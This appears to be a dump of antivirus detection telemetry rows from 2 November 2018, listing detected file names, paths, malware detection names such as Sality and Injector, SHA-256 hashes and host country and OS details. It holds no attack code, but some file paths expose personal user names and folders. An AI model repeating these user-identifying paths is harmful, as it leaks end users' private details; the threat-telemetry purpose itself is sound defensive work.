  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084723-9ed14087', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084705-9B95C50B\\AVSCAN-20181102-084723-9ED14087', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T01:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013226-312780d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1746dec7\\AVSCAN-20181102-012929-1886A83E\\AVSCAN-20181102-013226-312780D2', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='11d0c42bce778cf0330b8ffc16bdc356275f5812f6ee14d1f5137a314c33d50e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='luxury (1).exe', filepath='c:\\users\\X\\downloads\\luxury (1).exe', filesize=1024000, name='GAME/Casino.Gen.#M1.#R1'), hash='49f7979921ed9e8a90658b1fa0837e9f0befe740bc52b793062a83f390650809', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:37:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054247-190d7c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054247-190D7C79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051514-4036ee57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051514-4036EE57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060123-b26c008a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060123-B26C008A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050716-2304e545', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050716-2304E545', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050801-3e32926d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050801-3E32926D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134230-7237f7fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71a33499\\AVSCAN-20181102-133434-2FD57D88\\AVSCAN-20181102-134230-7237F7FC', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052522-aa9d13de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052522-AA9D13DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125913-0cb20726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125913-0CB20726', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:02:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150144-6295f947', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-150144-6295F947', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051704-81cdedb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051704-81CDEDB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055242-7c08c34d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055242-7C08C34D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152613-73ac7f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152613-73AC7F12', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:29:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054224-0bceb5e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054224-0BCEB5E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051702-8051ff0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051702-8051FF0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ngen.exe', filepath='E:\\金蝶K3\\K3_WISE_V14.3资源盘\\K3_Wise_V14.3_Resource\\OS_CHS\\DOTNETFX35\\win2012\\sxs\\x86_netfx-ngen_exe_b03f5f7f11d50a3a_6.2.9200.16384_none_82bd772bfa7bef58\\ngen.exe', filesize=168000, name='W32/Sality.AT.#M1.#R1'), hash='560de46eef4536d172202a2a9c3b0970fdc7e153fd19ef5e6d734573d80c54d2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\C:\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051557-59967ede', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051557-59967EDE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120539-1521c912', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120539-1521C912', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T02:05:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\PAJERO NOVA DAKAR - PWJE1712R\\SERVICE\\DATA\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='534e200df273867544749fe476c23e30a461c4937973b2c5cb302b7e3f6debfe', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:09:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ndxdrndk.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\nDxdrNdk.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba1bc167', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA1BC167', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050435-c2e2f160', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050435-C2E2F160', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061131-1cb8878a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061131-1CB8878A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054756-d14a29a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054756-D14A29A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060844-b92cc250', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060844-B92CC250', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054940-0f5360d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054940-0F5360D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062606-264ac325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062606-264AC325', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054748-ccd14726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054748-CCD14726', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055542-e762dd83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055542-E762DD83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051334-04499135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051334-04499135', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052411-801d5232', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052411-801D5232', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053011-567b89e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053011-567B89E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052852-27b9e2ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052852-27B9E2EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053034-643c3c47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053034-643C3C47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053034-64311534', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053034-64311534', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052327-65ede33d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052327-65EDE33D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052400-797dcf1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052400-797DCF1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:59Z'), dt=datetime.date(2018, 11, 2)),
